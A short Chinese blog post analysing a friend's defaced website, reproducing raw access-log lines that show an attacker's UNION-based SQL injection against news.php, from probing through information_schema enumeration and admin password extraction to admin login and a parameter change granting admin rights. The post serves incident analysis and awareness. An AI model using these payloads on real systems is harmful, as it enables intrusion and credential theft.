典型sql injection攻擊手法

朋友網站被駭客入侵改首頁
我看了一下log,發現了有趣的事情

85.237.211.211 – – [16/Mar/2013:06:33:46 +0800] “GET /manager.php HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:33:47 +0800] “GET /news.php?id=76 HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:33:50 +0800] “GET /news.php?id=999999.9 HTTP/1.1” 200 12580
85.237.211.211 – – [16/Mar/2013:06:33:52 +0800] “GET /news.php?id=76+and+1%3D1 HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:33:53 +0800] “GET /news.php?id=76+and+1%3E1 HTTP/1.1” 200 12580
85.237.211.211 – – [16/Mar/2013:06:33:54 +0800] “GET /news.php?id=76+and+1%3D1 HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:33:56 +0800] “GET /news.php?id=76%27 HTTP/1.1” 200 6814
85.237.211.211 – – [16/Mar/2013:06:33:57 +0800] “GET /news.php?id=%2F*%2130000+76*%2F HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:34:00 +0800] “GET /news.php?id=%2F*%2140100+76*%2F HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:34:02 +0800] “GET /news.php?id=%2F*%2150000+76*%2F HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:34:03 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:34:04 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:05 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:06 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:07 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:08 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:10 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:11 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:12 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12620
85.237.211.211 – – [16/Mar/2013:06:34:14 +0800] “GET /news.php?id=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12620
85.237.211.211 – – [16/Mar/2013:06:34:15 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12635
85.237.211.211 – – [16/Mar/2013:06:34:16 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2Cconcat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12623
85.237.211.211 – – [16/Mar/2013:06:34:26 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x69626563636F6D7477%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12615
85.237.211.211 – – [16/Mar/2013:06:34:27 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28group_concat%28table_name%29+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x69626563636F6D7477%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12668
85.237.211.211 – – [16/Mar/2013:06:34:32 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Ccount%28column_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.columns+where+table_schema%3D0x69626563636F6D7477+and+table_name%3D0x61646D696E6973747261746F72%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12616
85.237.211.211 – – [16/Mar/2013:06:34:34 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28group_concat%28column_name%29+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.columns+where+table_schema%3D0x69626563636F6D7477+and+table_name%3D0x61646D696E6973747261746F72%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12695
從information_schema拿到db架構
114.46.219.96 – – [16/Mar/2013:06:34:38 +0800] “GET / HTTP/1.1” 200 1191
114.46.219.96 – – [16/Mar/2013:06:34:40 +0800] “GET /Scripts/AC_RunActiveContent.js HTTP/1.1” 200 2413
114.46.219.96 – – [16/Mar/2013:06:34:40 +0800] “GET /js/jquery-1.7.1.min.js HTTP/1.1” 200 33140
85.237.211.211 – – [16/Mar/2013:06:34:40 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Ccount%28*%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12615
85.237.211.211 – – [16/Mar/2013:06:34:42 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280×27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_account+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admin+Order+by+a_account+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12619
85.237.211.211 – – [16/Mar/2013:06:34:43 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280×27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_password+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12624
85.237.211.211 – – [16/Mar/2013:06:34:45 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280×27%2C0x7e%2Cunhex%28Hex%28cast%28admin.a_account+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+1%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12619
85.237.211.211 – – [16/Mar/2013:06:34:46 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280×27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_password+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+1%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12624
85.237.211.211 – – [16/Mar/2013:06:34:47 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280×27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_account+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+2%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12617
拿到密碼後就進去了
85.237.211.211 – – [16/Mar/2013:06:35:12 +0800] “POST /admin/login.php HTTP/1.1” 302 1129
85.237.211.211 – – [16/Mar/2013:06:35:13 +0800] “GET /admin/index.php HTTP/1.1” 200 712
85.237.211.211 – – [16/Mar/2013:06:35:17 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:17 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:18 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:28 +0800] “GET /admin/administrator.php HTTP/1.1” 200 1303
85.237.211.211 – – [16/Mar/2013:06:35:30 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:31 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:32 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:34 +0800] “GET /admin/administrator-editor.php?a_contorller=admin HTTP/1.1” 200 1421
改個admin就拿到admin….這種寫法小職員也可以變老闆阿…
看來…面試php程式設計師時,真的要把sql injection列入必考題阿